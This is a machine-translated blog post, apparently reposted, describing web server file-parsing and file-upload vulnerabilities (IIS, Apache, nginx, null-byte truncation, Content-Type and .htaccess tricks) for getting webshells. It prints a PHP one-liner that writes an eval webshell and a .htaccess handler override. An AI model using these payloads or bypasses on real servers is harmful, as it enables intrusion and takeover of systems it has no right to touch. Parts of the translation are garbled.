On file parsing and uploading vulnerability

650) this.width=650; "Src=" Http://upload-images.jianshu.io/upload_images/3197538-c84b81d44ee77f41.png?imageMogr2 /auto-orient/strip%7cimageview2/2/w/1240 "style=" Border:0px;vertical-align:middle;height:auto; "alt=" 1240 "/>

Chinese kitchen Knives

In Web infiltration, I most expect two kinds of vulnerabilities, one is arbitrary command execution vulnerability, such as struct2 vulnerability, and the other is file upload vulnerability, because both of these vulnerabilities are the fastest and most direct way to obtain server permissions. For arbitrary command execution vulnerability, if it is mapped through the intranet, it may also need to use different means of Trojan file upload, so as to obtain Webshell, through the Webshell port forwarding or privilege elevation.
This article is mainly to introduce the personal use of the file Upload experience Summary, the explanation is divided into two parts: one is the file parsing vulnerability, and the other part is the file upload vulnerability.

File Parsing Vulnerability

The main reason is that some special files have been exploited by IIS, Apache, Nginx and other services to interpret the script file format and execute it in some cases.

IIS 5.x/6.0 Parsing Vulnerability

iis6.0 The following three main parsing vulnerabilities:
1. Directory Parsing Vulnerability/xx.asp/xx.jpg
Create a folder under the site named. asp,. ASA, and any file extension within its directory is parsed and executed by IIS as an ASP file. So as long as an attacker can upload a picture horse directly through the vulnerability, and can not need to change the suffix name!
2. File parsing xx.asp;. Jpg
Under iis6.0, the semicolon is not parsed, so xx.asp;. JPG is parsed for ASP script execution.
3. File type Resolution ASA/CER/CDX
iis6.0 The default executable file includes these three ASA, CER, CDX in addition to ASP.

Apache Parsing Vulnerability

Apache parsing of files is mainly from right to left to judge and parse, if judged as unresolved type, then continue to the left to parse, such as xx.php.wer.xxxxx will be resolved to PHP type.

IIS 7.0/nginx <8.03 Malformed Parsing vulnerability

In the default fast-cgi on the upload name xx.jpg, the content is:
<?PHP fputs(fopen(‘shell.php‘,‘w‘),‘<?php eval($_POST[cmd])?>‘);?>
Then visit xx.jpg/.php, in this directory will generate a sentence Trojan shell.php.

nginx<8.03 null-byte code execution vulnerability

Nginx the following version: 0.5. , 0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37 when executing PHP with php-fastcgi, the URL is inconsistent with%00 processing when it encounters fastcgi null bytes. Causes the code to be executed in the image by embedding PHP code and then accessing xxx.jpg%00.php.
Another nginx file vulnerability is from left to right parsing, can bypass the suffix name restrictions, but also can upload Trojan files, so you can upload XXX.jpg.php (may be luck, it may be the problem of the code itself, but in the other can not be successful under the conditions to try). As follows:
Content-Disposition: form-data; name="userfiles"; filename="XXX.jpg.php"

htaccess file parsing

If Apache. htaccess can be executed and can be uploaded, then you can try writing in. htaccess:
<FilesMatch "shell.jpg">SetHandler application/x-httpd-php</FilesMatch>
Then upload shell.jpg Trojan, so that the shell.jpg can be parsed into PHP files.

Operating System feature resolution

Because Windows will be the suffix of the file to filter the spaces and points, if you encounter a blacklist check, such as restrictions do not allow uploading PHP files, and the system is a Windows system, then we can upload xx.php, Or xx.php., this way you can bypass the blacklist test file upload!

File Upload vulnerability file Header Spoofing Vulnerability

In a word Trojan before adding gif89a, and then save the Trojan as a picture format, you can cheat simple WAF.

FilePath vulnerability

FilePath vulnerability is mainly used to break through the server automatic naming rules, mainly has the following two ways to use:
1, change the file upload path (filepath), can be combined with directory Parsing vulnerability,路径/x.asp/
2, directly change the name of the file (all under the FilePath to modify),路径/x.asp;.

00 Truncation

Two ways to use 00 Truncation:
1. Change filename,xx.php. jpg, burpsuit the space corresponding hex 20 to 00
2, change the filename,xx.php%00.jpg, Burpsuit%00 in the right-click conversion-url-urldecoder

FileType vulnerability

FileType vulnerability is mainly for the Content-type field, there are two main ways to use:
1. Upload a picture first, thencontent-type:images/jpegSwitchcontent-type:text/asp, and then 00 truncation of the filename, replacing the picture content with a word trojan.
2, directly using burp grab bag, get post upload data, willContent-Type: text/plainChange intoContent-Type: image/gif。

iconv function Limit Upload

If one day you upload a file to discover, no matter what file you upload, The uploaded file will automatically add a. jpg suffix, then we can doubt whether the use of iconv this function to upload the limit, at this time we can use a similar 00 truncation method, but this is not 00 truncation, two is 80-ef truncation, that is, we can modify hex 80 to one of the EF to truncate , if you really use this function, then congratulations on uploading any file successfully! If you upload a xx.php, then truncate the packet to change the following space corresponding to the 16 binary to 80 to any of the EF!

Dual File Upload

Again a file upload place, right-click the review element, first modify the action for the full path, and then copy and paste the upload browse file (<input ... ), so there will be two upload boxes, the first upload normal files, the second choice of a word trojan, and then submit. Reference links

Form Submit button

We sometimes scan to find the upload path, but there is only one browse file, but there is no submit button, we need to write the submit button at this time.
Write the form:
F12 The review element, add the Submit button code below the Select File form.
<input type="submit" value="提交" name="xx">

This article is from the "eth10" blog, make sure to keep this source http://eth10.blog.51cto.com/13143704/1956032

On file parsing and uploading vulnerability